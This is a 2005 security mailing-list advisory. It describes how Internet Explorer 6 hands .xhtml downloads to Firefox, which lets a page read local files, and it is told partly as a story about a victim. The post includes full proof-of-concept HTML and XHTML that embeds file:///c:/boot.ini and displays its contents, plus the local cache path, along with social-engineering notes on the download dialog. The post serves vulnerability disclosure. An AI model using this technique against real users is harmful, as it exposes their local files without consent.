[<prev] [next>] [day] [month] [year] [list]
Message-ID: <BAY103-F3D7A91F60828F518CEE98B92B0@phx.gbl>
Date: Wed Apr 20 11:56:47 2005
From: bitlance_3 at hotmail.com (bitlance winter)
Subject: IE6 kicks Firefox's BUG : Local Information
Disclosure
Hello , all.
IE6 kicks Firefox's BUG : Local Information Disclosure.
MIME types (commonly used on the web) determine what kind of content
is being sent down and give the browser an idea of how to parse,render
or otherwise deal with the content.
"application/zip", for example, is what's sent by the web server when
your browser accesses a ZIP file.
Directory-specific directive files such as .htaccess (as used by Apache,
for example) can be used to associate a particular MIME type with a given
file extension.For example, AddType application/xhtml+xml .xhtml will
configure Apache to send .xhtml files with application/xhtml+xml.
Internet Explorer's support of XHTML is incomplete.IE does not recognize
the xhtml MIME type - "application/xhtml+xml" which is required for true
XHTML compliance. So instead of rendering the page, a file download prompt
is presented to the user.
See also.
http://www.w3.org/TR/xhtml-media-types/
http://www.rfc-editor.org/rfc/rfc3236.txt
http://www.w3.org/People/mimasa/test/xhtml/media-types/
http://www.w3.org/People/mimasa/test/xhtml/media-types/results
Many people who wants to read XHTML files, install Firefox that supports
XHTML files with MIME type - "application/xhtml+xml" .
=========
STORY
=========
A man gets a new PC. OS is Windows XP SP2. Of course, he does not forget
WindowsUpdate. Now his machine is full-pached.
He installs Firefox, and sets that Firefox is as his default browser.
He wants to read XHTML files with "Content-Type: application/xhtml+xml".
Next day,he opens his Firefox Options General , clears "Firefox should
check to see if it is the default browser when starting" check box. And
he runs InternetExplorer, he sets IE as his default browser again.
Now he opens "My documents folder" window, choosing 'tools',then 'folder
options', 'filetypes' tab. He selects the filetype ".xhtml" and check
out it. He find that Firefox is still associated with the file type.
Yes. InternetExplorer can not open XHTML files, he thinks. O.K. when
he wants to read HTML files, IE opens the pages, and when he wants to
read XHTML files, Firefox opens the resources, COOL TIPS! he thinks.
=========
NOTE
=========
=== He is wrong. That is not COOL. ===
=========
STORY
=========
An attacker makes "bar.xhtml" (application/xhtml+xml) and "foo.html"
(text/html). Below are samples.
=== http://[malicious-site]/foo.html ===
The server gives Content-Type: text/html
========================================
<html>
<head>
<title>link to bar.xhtml</title>
<meta http-equiv="Refresh" content="1; URL=./bar.xhtml">
</head>
<body><a href="./bar.xhtml">Click Me.</a>
</body>
</html>
========================================
=== http://[malicious-site]/bar.xhtml ===
The server gives Content-Type: application/xhtml+xml
=========================================
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>IE - Firefox : Local Information Disclosure
</title>
<link rev="MADE" href="mailto:foo@...mple.com" />
<link rel="CONTENTS" href="./" />
<script type="text/javascript">
<![CDATA[
function Test(){
alert(local_file.document.firstChild.innerHTML);
}
window.onload=Test;
]]>
</script>
</head>
<body>
<h1>IE - Firefox : Local Information Disclosure</h1>
<h2>
boot.ini (Windows XP with Service Pack 2)
</h2>
<div>
<object data="file:///c:/boot.ini" type="text/plain" width="780"
height="130" name="local_file">
<p>display local_file</p>
</object>
</div>
<h2>
%USERPROFILE% Folder , Internet Cache Folder Random PATH for IE
</h2>
<div>
<script type="text/javascript">
<![CDATA[
var displocation=location.href;
var divElement=document.createElement('DIV');
divElement.setAttribute('style',
'color:black; background-color:BlanchedAlmond;');
document.body.appendChild(divElement);
var text=document.createTextNode(displocation);
divElement.appendChild(text);
]]>
</script>
</div>
</body>
</html>
=========================================
=========
NOTE
=========
See also.
[Bugzilla]
https://bugzilla.mozilla.org/show_bug.cgi?id=273419
https://bugzilla.mozilla.org/show_bug.cgi?id=230606
[Full-Disclosure ML]
Disclosure of local file content in Mozilla Firefox and Opera
http://lists.grok.org.uk/pipermail/full-disclosure/2004-December/
029833.html --- Giovanni Delvecchio
029846.html --- Juergen Schmidt
029856.html --- Thor Larholm
(Thanks a lot.)
=========
STORY
=========
One day, he uses IE, and visits the attacker's site.
As soon as he accesses the URL , http://[malicious-site]/foo.html ,
he sees the "File Download" dialog box pop up.
===============================================
File Download - Security Warning
Do you want to run or save this file?
Name: bar.xhtml
Type: Unknown (file type), 1.23 KB
From: [malicious-site]
button: [Run] [Save] [Cancel]
check box: Always ask before opening this type of file
Blue Shield Icon :
While files from the Internet can be useful,this file type can
potencially harm your computer. If you do not trust the source, do not
run or save this software. What's the risk?
================================================
=========
NOTE
=========
Be careful to Checkbox, And Blue Shield Icon. Not yellow Icon !!
=========
STORY
=========
He read this Dialog and think that ,,,,,,.
- O.K. It is NOT yellow Icon. if the file is bad one, Icon is yellow
- or red. Why blue Icon ? Because "bar.xhtml" is a XHTML file and
- it is safe. Type is unknown? Because IE does not recognize
- the xhtml MIME type. Good.
- Hmmmmm. "Always ask before opening this type of file" ?
- XHTML file is safe when Firefox opens it. I will clear the check
- box. That is all. O.K. Now I will click the "Run" button.
=========
NOTE
=========
When you first choose to download a file in Internet Explorer, you
receive a Confirm File Open dialog box."The Always ask before opening
this type of file" check box in this dialog box is selected.
If you clear the "Always ask before opening this type of file" check
box, the registry entry for this setting is changed and you do not see
the Confirm File Open dialog box in subsequent download sessions.
Instead, Internet Explorer automatically opens files instead of
downloading them.
By the way, see also.
http://www.microsoft.com/technet/security/smallbusiness/prodtech/
windowsxp/iesecxp.mspx
[quoted]
Heed any warnings. When a Web site attempts to download a file to your
computer, Internet Explorer displays a message about saving, running,
or installing the file. If the message contains a yellow caution icon,
then the file has been identified as one that could pose a risk.
[/quoted]
Where is about blue Icon? Is it safe? ;-)
In this story, 'HE' knows that yellow or red is dangerous icon.
At last he clicks 'Run' button.
=========
STORY
=========
Firefox runs and display http://[malicious-site]/bar.xhtml
Files of this XHTML type are automatically placed
=== in the Temporary Internet Files folder ====
and opened by the program that is associated with the file type.
Then his local machine information is disclosed via javascript.
boot.ini
%USERPROFILE%
Internet Cache Folder Random PATH for IE
and so on E.T.C.
He is very surprised.
His name is bitlance winter.... ;-<
=========
NOTE
=========
This is a bad behavior of InternetExplorer.
"Files of the type are automatically placed
=== in the Temporary Internet Files folder ====
and opened by the program that is associated with the file type."
This is a bad behavior of InternetExplorer ,too.
If he does not clear the checkbox "Allways..." when he clicks
"Run" button, files of the type are placed
=== in the Temporary Internet Files folder ====
and opened by the program that is associated with the file type.
Firefox ? uhhhmmmmmm .
Opera is FIXED, perhaps.
Tested on
WindowsXP SP2
InternetExlorer6 SP2 full-patched (Japanese version)
- Version 6.0.2900.2180.xpsp_sp2_gdr.050301-1519
Filrefox 1.0.3 (en-US)
- Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7)
- Gecko/20050414 Firefox/1.0.3
Sorry too bad English.
Thank you for your reading this true story.
Best Regards.
--
bitlance winter
_________________________________________________________________
Don’t just search. Find. Check out the new MSN Search!
http://search.msn.click-url.com/go/onm00200636ave/direct/01/
Powered by blists - more mailing lists